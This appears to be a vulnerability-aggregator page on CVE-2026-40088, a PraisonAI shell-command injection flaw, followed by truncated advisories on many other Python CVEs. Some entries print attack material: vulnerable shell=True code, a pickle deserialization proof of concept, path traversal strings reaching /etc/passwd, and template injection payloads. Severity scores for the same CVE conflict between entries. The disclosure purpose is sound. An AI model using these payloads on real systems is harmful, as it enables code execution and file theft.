CVE-2026-40088
published 2026-04-09CVE-2026-40088: PraisonAI is a multi-agent teams system. Prior to 4.5.121, the execute_command function and workflow shell execution are exposed to user-controlled input via…
PriorityP354critical9.6CVSS 3.1
AVNACLPRNUIRSCCHIHAH
EPSS
0.42%
33.5th percentile
PraisonAI is a multi-agent teams system. Prior to 4.5.121, the execute_command function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to inject arbitrary shell commands through shell metacharacters. This vulnerability is fixed in 4.5.121.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mervinpraison | praisonai | < 4.5.121 | 4.5.121 |
| mervinpraison | praisonai | >= 0 < 4.5.121 | 4.5.121 |
| praison | praisonai | < 4.5.121 | 4.5.121 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
MervinPraison PraisonAI up to 4.5.120 execute_command os command injection
vuldb·2026-04-09·CVSS 9.6
CVE-2026-40088 [CRITICAL] MervinPraison PraisonAI up to 4.5.120 execute_command os command injection
A vulnerability has been found in MervinPraison PraisonAI up to 4.5.120 and classified as critical. The affected element is the function execute_command. The manipulation leads to os command injection.
This vulnerability is documented as CVE-2026-40088. The attack can be initiated remotely. There is not any exploit available.
The affected component should be upgraded.
OSV
PraisonAI Vulnerable to OS Command Injection
osv·2026-04-08
CVE-2026-40088 [CRITICAL] PraisonAI Vulnerable to OS Command Injection
PraisonAI Vulnerable to OS Command Injection
The `execute_command` function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to inject arbitrary shell commands through shell metacharacters.
---
## Description
PraisonAI's workflow system and command execution tools pass user-controlled input directly to `subprocess.run()` with `shell=True`, enabling command injection attacks. Input sources include:
1. YAML workflow step definitions
2. Agent configuration files (agents.yaml)
3. LLM-generated tool call parameters
4. Recipe step configurations
The `shell=True` parameter causes the shell to interpret metacharacters (`;`, `|`, `&&`, `$()`, etc.), allowing attackers to execute arbitrary
GHSA
PraisonAI Vulnerable to OS Command Injection
ghsa·2026-04-08
CVE-2026-40088 [CRITICAL] CWE-78 PraisonAI Vulnerable to OS Command Injection
PraisonAI Vulnerable to OS Command Injection
The `execute_command` function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to inject arbitrary shell commands through shell metacharacters.
---
## Description
PraisonAI's workflow system and command execution tools pass user-controlled input directly to `subprocess.run()` with `shell=True`, enabling command injection attacks. Input sources include:
1. YAML workflow step definitions
2. Agent configuration files (agents.yaml)
3. LLM-generated tool call parameters
4. Recipe step configurations
The `shell=True` parameter causes the shell to interpret metacharacters (`;`, `|`, `&&`, `$()`, etc.), allowing attackers to execute arbitrary
No detection rules found.
No public exploits indexed.
Checkpoint
11th December – Threat Intelligence Report
blogs_checkpoint·2023-12-11
CVE-2023-40088 11th December – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 11th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 11th December, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
The American Greater Richmond Transit Company (GRTC), which provides services for millions of people, has been a victim of cyber-attack that impacted certain applications and parts of the GRTC network. The Play ransomware gang claimed responsibility for the attack.
Check Point Harmony Endpoint and Threat Emulation prov
Wiz
CVE-2026-33753 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.2
CVE-2026-33753 [MEDIUM] CVE-2026-33753 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33753 :
Python vulnerability analysis and mitigation
rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intend
Wiz
CVE-2026-39844 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-39844 [MEDIUM] CVE-2026-39844 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39844 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. Prior to 3.10.0, Since PurePosixPath only recognizes forward slashes (/) as path separators, an attacker can bypass this sanitization on Windows by using backslashes () in the upload filename. Applications that construct file paths using file.name (a pattern demonstrated in NiceGUI's bundled examples) are vulnerable to arbitrary file write on Windows. This vulnerability is fixed in 3.10.0.
Source : NVD
## 5.9
Score
Published April 8, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.9
Exploitation Probability (EPSS) 0
Wiz
CVE-2026-40087 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-40087 [MEDIUM] CVE-2026-40087 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-40087 :
Python vulnerability analysis and mitigation
LangChain is a framework for building agents and LLM-powered applications. Prior to 0.3.84 and 1.2.28, LangChain's f-string prompt-template validation was incomplete in two respects. First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting. Second, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. In this pattern, the nested replacement field appears in the for
Wiz
CVE-2026-39890 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-39890 [CRITICAL] CVE-2026-39890 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39890 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to 4.5.115, the AgentService.loadAgentFromFile method uses the js-yaml library to parse YAML files without disabling dangerous tags (such as !!js/function and !!js/undefined). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpoint, leading to remote code execution (RCE) on the server. This vulnerability is fixed in 4.5.115.
Source : NVD
## 9.8
Score
Published April 8, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/
Wiz
CVE-2026-35592 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-35592 [HIGH] CVE-2026-35592 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35592 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the _safe_extractall() function in src/pyload/plugins/extractors/UnTar.py uses os.path.commonprefix() for its path traversal check, which performs character-level string comparison rather than path-level comparison. This allows a specially crafted tar archive to write files outside the intended extraction directory. The correct function os.path.commonpath() was added to the codebase in the CVE-2026-32808 fix (commit 5f4f0fa) but was never applied to _safe_extractall(), making this an incomplete fix. This vulnerability is fixed in 0.5.0b3.dev97.
Source : NVD
## 5.3
Score
Published April 7, 2026
Severity MEDIUM
CNA Score 5.3
Wiz
CVE-2026-35586 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-35586 [MEDIUM] CVE-2026-35586 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35586 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. This vulnerability is fixed in 0.5.0b3.dev97.
Source : NVD
## 6.8
Score
Published April 7, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
Has Public Exploit No
Wiz
GHSA-9gjv-jvm7-vv2v Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-9gjv-jvm7-vv2v Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9gjv-jvm7-vv2v :
Python vulnerability analysis and mitigation
## Summary
GET /api/people/
GET /api/places/
GET /api/events/
## Affected Versions
All versions of Gramps Web API prior to the fix.
## Root Cause
PrivateProxyDb.iter_*()
ProxyDbBase.__iter_object()
iter_*()
PrivateProxyDb
PrivateProxyDb.get_*_from_handle()
sanitize_*()
ModifiedPrivateProxyDb
iter_*()
PrivateProxyDb
## Conditions Required
This issue only affects trees in which sub-objects have been explicitly marked private in Gramps desktop. The Gramps Web frontend UI does not expose controls for setting the private flag on sub-objects (alternate names, addresses, notes,
citations, media references, event references, etc.). In practice, such flags are set in Gramps desktop and then synced or imp
Wiz
CVE-2026-39413 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.2
CVE-2026-39413 [MEDIUM] CVE-2026-39413 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39413 :
Python vulnerability analysis and mitigation
LightRAG provides simple and fast retrieval-augmented generation. Prior to 1.4.14, the LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the jwt.decode() call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access. This vulnerability is fixed in 1.4.14.
Source : NVD
## 4.2
Score
Published April 8, 2026
Severity MEDIUM
CNA Score 4.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (
Wiz
CVE-2026-5600 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-5600 [MEDIUM] CVE-2026-5600 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5600 :
Python vulnerability analysis and mitigation
A new API endpoint introduced in pretix 2025 that is supposed to
return all check-in events of a specific event in fact returns all
check-in events belonging to the respective organizer. This allows an
API consumer to access information for all other events under the same
organizer, even those they should not have access to.
These records contain information on the time and result of every ticket scan as well as the ID of the matched ticket. Example:
{
"id": 123,
"successful": true,
"error_reason": null,
"error_explanation": null,
"position": 321,
"datetime": "2020-08-23T09:00:00+02:00",
"list": 456,
"created": "2020-08-23T09:00:00+02:00",
"auto_checked_in": false,
"gate": null,
"device": 1,
"device_id": 1,
"type": "entry"
Wiz
CVE-2026-39888 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-39888 [CRITICAL] CVE-2026-39888 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39888 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to 1.5.115, execute_code() in praisonaiagents.tools.python_tools defaults to sandbox_mode="sandbox", which runs user code in a subprocess wrapped with a restricted builtins dict and an AST-based blocklist. The AST blocklist embedded inside the subprocess wrapper (blocked_attrs of python_tools.py) contains only 11 attribute names — a strict subset of the 30+ names blocked in the direct-execution path. The four attributes that form a frame-traversal chain out of the sandbox are all absent from the subprocess list ( traceback , tb_frame, f_back, and f_builtins). Chaining these attributes through a caught exception exposes the real Python builtins dict of the subprocess wrapper fra
Wiz
CVE-2026-1163 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.1
CVE-2026-1163 [MEDIUM] CVE-2026-1163 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1163 :
Python vulnerability analysis and mitigation
An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject requests after a period of inactivity and the excessively long default session duration of 31 days. The vulnerability enables an attacker to maintain persistent access to a compromised account, even after the victim resets their password.
Source : NVD
## 4.1
Score
Published April 8, 2026
Severity MEDIUM
CNA Score 4.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV
Wiz
CVE-2026-39981 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-39981 [HIGH] CVE-2026-39981 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39981 :
Python vulnerability analysis and mitigation
AGiXT is a dynamic AI Agent Automation Platform. Prior to 1.9.2, the safe_join() function in the essential_abilities extension fails to validate that resolved file paths remain within the designated agent workspace. An authenticated attacker can use directory traversal sequences to read, write, or delete arbitrary files on the server hosting the AGiXT instance. This vulnerability is fixed in 1.9.2.
Source : NVD
## 8.8
Score
Published April 9, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and librarie
Wiz
GHSA-766v-q9x3-g744 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-766v-q9x3-g744 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-766v-q9x3-g744 :
Python vulnerability analysis and mitigation
## Summary
MultiAgentLedger
MultiAgentMonitor
MultiAgentLedger
MultiAgentMonitor
base_path
../
## Details
## Vulnerability 1: Memory State Leakage
examples/context/12_multi_agent_context.py:68
MultiAgentLedger
self.ledgers
get_agent_ledger
Exploitability : An attacker can register an agent with the same ID as a victim agent to gain access to their ledger. This is particularly dangerous in multi-tenant systems where agents may handle sensitive user data.
## Vulnerability 2: Path Traversal
examples/context/12_multi_agent_context.py:106
MultiAgentMonitor
base_path
../../malicious
base_path
../../etc/passwd
## PoC
## Memory State Leakage
multi_ledger = MultiAgentLedger()
# Victim agent (use
Wiz
CVE-2026-39373 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-39373 [MEDIUM] CVE-2026-39373 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39373 :
Python vulnerability analysis and mitigation
JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to 1.5.7, an unauthenticated attacker can exhaust server memory by sending crafted JWE tokens with ZIP compression. The existing patch for CVE-2024-28102 limits input token size to 250KB but does not validate the decompressed output size. An unauthenticated attacker can cause memory exhaustion on memory-constrained systems. A token under the 250KB input limit can decompress to approximately 100MB. This vulnerability is fixed in 1.5.7.
Source : NVD
## 5.3
Score
Published April 7, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-39376 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-39376 [HIGH] CVE-2026-39376 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39376 :
Python vulnerability analysis and mitigation
FastFeedParser is a high performance RSS, Atom and RDF parser. Prior to 0.5.10, when parse() fetches a URL that returns an HTML page containing a tag, it recursively calls itself with the redirect URL — with no depth limit, no visited-URL deduplication, and no redirect count cap. An attacker-controlled server that returns an infinite chain of HTML meta-refresh responses causes unbounded recursion, exhausting the Python call stack and crashing the process. This vulnerability can also be chained with the companion SSRF issue to reach internal network targets after bypassing the initial URL check. This vulnerability is fixed in 0.5.10.
Source : NVD
## 7.5
Score
Published April 7, 2026
Severity HIGH
CNA Score 7.5
Affec
Wiz
CVE-2026-40072 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-40072 [MEDIUM] CVE-2026-40072 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-40072 :
Python vulnerability analysis and mitigation
web3.py allows you to interact with the Ethereum blockchain using Python. From 6.0.0b3 to before 7.15.0 and 8.0.0b2, web3.py implements CCIP Read / OffchainLookup (EIP-3668) by performing HTTP requests to URLs supplied by smart contracts in offchain_lookup_payload["urls"]. The implementation uses these contract-supplied URLs directly (after {sender} / {data} template substitution) without any destination validation. CCIP Read is enabled by default (global_ccip_read_enabled = True on all providers), meaning any application using web3.py's .call() method is exposed without explicit opt-in. This results in Server-Side Request Forgery (SSRF) when web3.py is used in backend services, indexers, APIs, or any environment that perfo
Wiz
CVE-2026-39891 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-39891 [HIGH] CVE-2026-39891 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39891 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to 4.5.115, the create_agent_centric_tools() function returns tools (like acp_create_file) that process file content using template rendering. When user input from agent.start() is passed directly into these tools without escaping, template expressions in the input are executed rather than treated as literal text. This vulnerability is fixed in 4.5.115.
Source : NVD
## 8.8
Score
Published April 8, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.7
Exploitation Probability (EPSS) N/A
Affected packages and librar
Wiz
CVE-2026-31040 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-31040 [CRITICAL] CVE-2026-31040 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31040 :
Python vulnerability analysis and mitigation
A vulnerability was identified in stata-mcp prior to v1.13.0 where insufficient validation of user-supplied Stata do-file content can lead to command execution.
Source : NVD
## 9.8
Score
Published April 8, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
stata-mcp
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 09, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Pytho
Wiz
GHSA-r758-8hxw-4845 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
[MEDIUM] GHSA-r758-8hxw-4845 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-r758-8hxw-4845 :
Python vulnerability analysis and mitigation
## Summary
justhtml
## Impact
SanitizationPolicy
drop_foreign_namespaces=False
allowlisted foreign elements such as MathML or SVG
## Affected versions
justhtml
## Notes
JustHTML(..., sanitize=True)
## Credit
justhtml
Source : NVD
## 2.1
Score
Published April 8, 2026
Severity LOW
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
justhtml
Sources
NVD
pip Severity LOW Has Fix Added at: Apr 09, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you c
Wiz
GHSA-2763-cj5r-c79m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-2763-cj5r-c79m Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-2763-cj5r-c79m :
Python vulnerability analysis and mitigation
execute_command
## Description
subprocess.run()
shell=True
shell=True
;
|
&&
$()
## Affected Code
Primary command execution (shell=True default):
# code/tools/execute_command.py:155-164
def execute_command(command: str, shell: bool = True, ...):
if shell:
result = subprocess.run(
command, # User-controlled input
shell=True, # Shell interprets metacharacters
cwd=work_dir,
capture_output=capture_output,
timeout=timeout,
env=cmd_env,
text=True,
)
Workflow shell step execution:
# cli/features/job_workflow.py:234-246
def _exec_shell(self, cmd: str, step: Dict) -> Dict:
"""Execute a shell command from workflow step."""
cwd = step.get("cwd", self._cwd)
env = self._build_env(step)
result = subprocess.run(
cmd,
Wiz
GHSA-89gg-p5r5-q6r4 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
[CRITICAL] GHSA-89gg-p5r5-q6r4 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-89gg-p5r5-q6r4 :
Python vulnerability analysis and mitigation
## Summary
algo_from_pickle
monai/auto3dseg/utils.py
pickle.loads(data_bytes)
## Details
poc
import pickle
import subprocess
class MaliciousAlgo:
def __reduce__(self):
return (subprocess.call, (['calc.exe'],))
malicious_algo_bytes = pickle.dumps(MaliciousAlgo())
attack_data = {
"algo_bytes": malicious_algo_bytes,
}
attack_pickle_file = "attack_algo.pkl"
with open(attack_pickle_file, "wb") as f:
f.write(pickle.dumps(attack_data))
Generate the malicious file "attack_algo.pkl" through POC.
from monai.auto3dseg.utils import algo_from_pickle
attack_pickle_file = "attack_algo.pkl"
result = algo_from_pickle(attack_pickle_file)
Ultimately, it will trigger pickle.load through a file to identify the command executio
Wiz
CVE-2026-22680 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-22680 [MEDIUM] CVE-2026-22680 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22680 :
Python vulnerability analysis and mitigation
OpenViking versions prior to 0.3.3 contain a missing authorization vulnerability in the task polling endpoints that allows unauthorized attackers to enumerate or retrieve background task metadata created by other users. Attackers can access the /api/v1/tasks and /api/v1/tasks/{task_id} routes without authentication to expose task type, task status, resource identifiers, archive URIs, result payloads, and error information, potentially causing cross-tenant interference in multi-tenant deployments.
Source : NVD
## 6.9
Score
Published April 7, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2026-40071 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-40071 [MEDIUM] CVE-2026-40071 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-40071 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the /json/package_order, /json/link_order, and /json/abort_link WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute MODIFY operations that should be denied by pyLoad's own permission model. This vulnerability is fixed in 0.5.0b3.dev97.
Source : NVD
## 5.4
Score
Published April 9, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected
Wiz
CVE-2026-34444 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.9
CVE-2026-34444 [HIGH] CVE-2026-34444 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34444 :
Python vulnerability analysis and mitigation
Lupa integrates the runtimes of Lua or LuaJIT2 into CPython. In 2.6 and earlier, attribute_filter is not consistently applied when attributes are accessed through built-in functions like getattr and setattr. This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code execution.
Source : NVD
## 7.9
Score
Published April 6, 2026
Severity HIGH
CNA Score 7.9
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
python-lupa
lupa
Sources
NVD
Debian 11, 14 No Fix Added at: Apr
Wiz
CVE-2026-39987 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-39987 [CRITICAL] CVE-2026-39987 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39987 :
Python vulnerability analysis and mitigation
marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands. Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification. This vulnerability is fixed in 0.23.0.
Source : NVD
## 9.3
Score
Published April 9, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Ex
Wiz
CVE-2026-5559 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-5559 [MEDIUM] CVE-2026-5559 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5559 :
Python vulnerability analysis and mitigation
A vulnerability has been found in AntaresMugisho PyBlade 0.1.8-alpha/0.1.9-alpha. The affected element is the function _is_safe_ast of the file sandbox.py of the component AST Validation. Such manipulation leads to improper neutralization of special elements used in a template engine. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 5.3
Score
Published April 5, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perc
Wiz
CVE-2026-39889 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-39889 [HIGH] CVE-2026-39889 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39889 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to 4.5.115, the A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activity without authentication. The create_a2u_routes() function registers the following endpoints with NO authentication checks: /a2u/info, /a2u/subscribe, /a2u/events/{stream_name}, /a2u/events/sub/{id}, and /a2u/health. This vulnerability is fixed in 4.5.115.
Source : NVD
## 7.5
Score
Published April 8, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-39892 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-39892 [MEDIUM] CVE-2026-39892 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39892 :
Python vulnerability analysis and mitigation
cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 45.0.0 to before 46.0.7, if a non-contiguous buffer was passed to APIs which accepted Python buffers (e.g. Hash.update()), this could lead to buffer overflows. This vulnerability is fixed in 46.0.7.
Source : NVD
## 6.9
Score
Published April 8, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fence-agents-ibm-vpc
fence-agents-nutanix-ahv
Sources
NVD
Alpine 3.23, edge Has
Wiz
CVE-2026-39847 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-39847 [CRITICAL] CVE-2026-39847 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39847 :
Python vulnerability analysis and mitigation
Emmett is a full-stack Python web framework designed with simplicity. From 2.5.0 to before 2.8.1, the RSGI static handler for Emmett's internal assets (/ emmett paths) is vulnerable to path traversal attacks. An attacker can use ../ sequences (eg / emmett /../rsgi/handlers.py) to read arbitrary files outside the assets directory. This vulnerability is fixed in 2.8.1.
Source : NVD
## 9.1
Score
Published April 7, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
emmett
Sources
NVD
pip
Wiz
GHSA-926x-3r5x-gfhw Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-926x-3r5x-gfhw Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-926x-3r5x-gfhw :
Python vulnerability analysis and mitigation
PromptTemplate
DictPromptTemplate
ImagePromptTemplate
"{message.additional_kwargs[secret]}"
"https://example.com/{image.__class__.__name__}.png"
Second, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. For example:
"{name:{name.__class__.__name__}}"
In this pattern, the nested replacement field appears in the format specifier rather than in the top-level field name. As a result, earlier validation based on parsed field names did not reject the template even though Python formatting would still attempt to resolve the nested expression at runtime.
## Affected usage
This issue is only relevant for applications that accept untrusted templ
Wiz
CVE-2026-40088 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-40088 [MEDIUM] CVE-2026-40088 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-40088 :
Python vulnerability analysis and mitigation
